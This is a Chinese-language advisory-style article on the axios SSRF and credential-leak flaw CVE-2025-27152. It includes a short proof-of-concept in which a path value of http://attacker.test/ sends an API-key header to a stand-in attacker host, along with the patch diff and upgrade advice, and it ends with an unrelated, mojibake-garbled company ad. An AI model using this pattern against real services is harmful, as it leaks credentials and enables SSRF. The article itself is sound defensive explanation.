背景

GitHub Advisory Database 最近发布了一个关于 axios 库的高严重性漏洞（CVE-2025-27152）。该漏洞涉及使用绝对 URL 时可能导致服务器端请求伪造（SSRF）和凭证泄露。

axios 是一个广泛使用的 JavaScript 库，用于在浏览器和 Node.js 中发起 HTTP 请求。目前最新版本是V1.8.3。

要点

漏洞描述

当使用绝对 URL 时，axios 会忽略 baseURL 的设置，直接将请求发送到指定的绝对 URL，这可能导致 SSRF 攻击和敏感凭证泄露。

在传递绝对 URL 而不是协议相对 URL 给 Axios 时，即使设置了 baseURL，Axios 仍然会向指定的绝对 URL 发送请求。这可能导致 SSRF（服务器端请求伪造）和凭据泄露。此问题影响 Axios 在服务器端和客户端的使用。

影响范围

所有使用 baseURL 且未对路径参数进行验证的软件都可能受到影响。

修复版本

axios 1.8.2 版本已修复此问题。

【第3234期】fetchLater：JS全新API支持关闭页面时安全发送网络请求

分析

该漏洞的核心问题在于 axios 在处理绝对 URL 时未正确验证 baseURL。例如，即使设置了 baseURL 为 http://example.test/api/v1/users/，如果用户传入的路径参数为 http://attacker.test/，axios 会将请求发送到 http://attacker.test/，而不是预期的 baseURL。

请考虑以下代码片段：

 import axios from"axios";

const internalAPIClient = axios.create({
   baseURL:"http://example.test/api/v1/users/",
   headers:{
     "X-API-KEY":"1234567890",
   },
});

// const userId = "123";
const userId ="http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

在这个示例中，请求被发送到了 http://attacker.test/，而不是 baseURL。因此，attacker.test 的域名所有者将能够获取请求头中包含的 X-API-KEY，导致凭据泄露。

【第3241期】await 能有什么风险？JavaScript 世界的隐忧

在 V1.8.2 中已修复此问题

 - const fullPath = buildFullPath(config.baseURL, config.url);
 + const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);

这可能导致以下问题：

凭证泄露

攻击者可以通过构造恶意 URL 获取包含敏感信息的请求头，如 API 密钥。

SSRF 攻击

攻击者可以利用此漏洞向内部网络中的其他主机发送请求，可能导致内部系统被入侵。

结论

axios 的这一漏洞再次提醒开发者在使用第三方库时需要密切关注安全更新。建议所有使用 axios 的项目尽快升级到 1.8.2 版本，并在代码中增加对路径参数的验证，以防止类似漏洞的利用。未来，随着 SSRF 攻击的增多，开发者应更加重视对请求 URL 的验证和过滤。

優(yōu)網(wǎng)科技秉承"專業(yè)團(tuán)隊(duì)、品質(zhì)服務(wù)" 的經(jīng)營(yíng)理念，誠(chéng)信務(wù)實(shí)的服務(wù)了近萬(wàn)家客戶，成為眾多世界500強(qiáng)、集團(tuán)和上市公司的長(zhǎng)期合作伙伴！

優(yōu)網(wǎng)科技成立于2001年，擅長(zhǎng)網(wǎng)站建設(shè)、網(wǎng)站與各類業(yè)務(wù)系統(tǒng)深度整合，致力于提供完善的企業(yè)互聯(lián)網(wǎng)解決方案。優(yōu)網(wǎng)科技提供PC端網(wǎng)站建設(shè)（品牌展示型、官方門(mén)戶型、營(yíng)銷商務(wù)型、電子商務(wù)型、信息門(mén)戶型、微信小程序定制開(kāi)發(fā)、移動(dòng)端應(yīng)用（手機(jī)站、APP開(kāi)發(fā)）、微信定制開(kāi)發(fā)（微信官網(wǎng)、微信商城、企業(yè)微信）等一系列互聯(lián)網(wǎng)應(yīng)用服務(wù)。